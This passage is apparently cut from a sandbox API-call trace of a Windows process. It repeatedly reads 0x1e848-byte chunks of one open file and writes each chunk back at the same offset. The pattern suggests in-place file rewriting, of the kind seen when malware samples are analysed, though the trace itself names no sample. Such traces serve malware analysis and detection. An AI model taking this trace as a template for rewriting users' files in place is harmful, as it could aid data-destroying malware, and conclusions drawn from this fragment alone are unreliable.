hHeap=0x500000) returned 1 [0120.637] GetProcessHeap () returned 0x500000 [0120.637] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.637] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c449b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.637] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.682] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c449b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.682] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.683] GetProcessHeap () returned 0x500000 [0120.683] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.683] GetProcessHeap () returned 0x500000 [0120.683] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.683] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c81a40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.683] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.693] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5c81a40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.693] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.694] GetProcessHeap () returned 0x500000 [0120.694] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.694] GetProcessHeap () returned 0x500000 [0120.694] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.694] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5cbead0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.694] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.702] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5cbead0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.703] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.703] GetProcessHeap () returned 0x500000 [0120.703] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.703] GetProcessHeap () returned 0x500000 [0120.703] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.703] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5cfbb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.703] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.739] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5cfbb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.739] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.741] GetProcessHeap () returned 0x500000 [0120.741] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.741] GetProcessHeap () returned 0x500000 [0120.741] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.741] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5d38bf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.741] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.752] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5d38bf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.752] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.752] GetProcessHeap () returned 0x500000 [0120.752] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.753] GetProcessHeap () returned 0x500000 [0120.753] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.753] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5d75c80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.753] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.763] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5d75c80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.763] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.764] GetProcessHeap () returned 0x500000 [0120.764] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.764] GetProcessHeap () returned 0x500000 [0120.764] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.764] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5db2d10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.764] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.775] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5db2d10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.775] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.776] GetProcessHeap () returned 0x500000 [0120.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.776] GetProcessHeap () returned 0x500000 [0120.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.776] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5defda0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.776] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.799] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5defda0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.799] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.800] GetProcessHeap () returned 0x500000 [0120.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.800] GetProcessHeap () returned 0x500000 [0120.800] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.800] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5e2ce30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.800] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.811] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5e2ce30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.811] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.812] GetProcessHeap () returned 0x500000 [0120.812] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.812] GetProcessHeap () returned 0x500000 [0120.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.812] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5e69ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.812] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.823] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5e69ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.823] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.823] GetProcessHeap () returned 0x500000 [0120.823] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.823] GetProcessHeap () returned 0x500000 [0120.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.823] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ea6f50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.824] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.836] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ea6f50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.836] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.837] GetProcessHeap () returned 0x500000 [0120.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.837] GetProcessHeap () returned 0x500000 [0120.837] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.837] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ee3fe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.837] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.856] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5ee3fe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.856] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.858] GetProcessHeap () returned 0x500000 [0120.858] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.858] GetProcessHeap () returned 0x500000 [0120.858] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.858] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f21070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.858] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.869] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f21070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.869] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.869] GetProcessHeap () returned 0x500000 [0120.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.870] GetProcessHeap () returned 0x500000 [0120.870] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.870] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f5e100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.870] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.882] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f5e100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.882] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.883] GetProcessHeap () returned 0x500000 [0120.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.883] GetProcessHeap () returned 0x500000 [0120.883] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.883] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f9b190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.883] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.893] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5f9b190, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.893] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.894] GetProcessHeap () returned 0x500000 [0120.894] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.894] GetProcessHeap () returned 0x500000 [0120.894] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.894] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5fd8220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.894] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.921] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5fd8220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.921] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.922] GetProcessHeap () returned 0x500000 [0120.922] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.922] GetProcessHeap () returned 0x500000 [0120.922] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.922] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x60152b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.922] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.945] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x60152b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.945] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.946] GetProcessHeap () returned 0x500000 [0120.946] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.946] GetProcessHeap () returned 0x500000 [0120.946] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.946] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6052340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.946] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.957] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6052340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.957] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.957] GetProcessHeap () returned 0x500000 [0120.957] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.957] GetProcessHeap () returned 0x500000 [0120.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.957] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x608f3d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.958] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.968] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x608f3d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.968] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.968] GetProcessHeap () returned 0x500000 [0120.968] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.968] GetProcessHeap () returned 0x500000 [0120.968] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.968] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x60cc460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.969] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.979] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x60cc460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.979] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.980] GetProcessHeap () returned 0x500000 [0120.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.980] GetProcessHeap () returned 0x500000 [0120.980] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.980] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61094f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.980] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.997] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61094f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.997] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.998] GetProcessHeap () returned 0x500000 [0120.998] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.998] GetProcessHeap () returned 0x500000 [0120.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.998] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6146580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.998] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.008] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6146580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.008] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.008] GetProcessHeap () returned 0x500000 [0121.008] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.008] GetProcessHeap () returned 0x500000 [0121.008] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.008] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6183610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.008] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.017] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6183610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.017] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, 